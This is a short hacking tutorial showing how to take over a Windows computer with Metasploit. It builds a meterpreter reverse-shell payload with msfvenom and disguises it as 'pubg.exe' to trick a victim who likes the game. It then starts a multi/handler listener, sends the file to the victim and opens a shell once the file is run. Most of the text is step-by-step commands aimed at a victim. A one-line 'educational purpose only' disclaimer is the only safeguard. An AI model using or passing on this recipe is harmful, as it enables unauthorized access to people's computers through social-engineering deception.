How to Hack Windows Using Metasploit Framework?
In this tutorial, I'll show you how to hack Windows using the Metasploit Framework. Metasploit is already installed in Kali Linux, so it's not necessary to install it.
If you follow this tutorial to the end, you will be able to gain access to the victim machine in a more or less complete way
Metasploit Framework is the most commonly used framework by hackers worldwide. By setting up listeners, hackers can create a conducive environment for manipulating compromised machines.
NOTE: do not use for an illegal purpose this is only for educational purpose
To hack a computer in this scene, we use littlebit social engineering. For instance, we gather information about the victim's liking of pubg, so we create a pubg name malicious exe file.
STEP1: msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe > pubg.exe
The entire malicious code will be written inside the pubg.exe file and will be executed as an exe program on the target machine
for LHOST use ifconfig command to see local host IP your system IP address

you can see here we created a exe file successfully now open the metasploit using msfconcole command
STEP2: msfconsole

now setup the multi handler environment and set the payload
STEP3: use multi/handler
STEP4: set payload windows/meterpreter/reverse_tcp
STEP5: set LHOST <local host IP>
STEP6: set LPORT <local port>
STEP7: exploit

now after exploit send the payload to the victim

now you can see after victim install the exe file you got the meterpreter but for accessing shell type shell command
STEP7: shell

So, it was all about how to hack Windows using Metasploit framework.
Now further more commands to control you have to learn the basic windows commands.
by Abhishek Joshi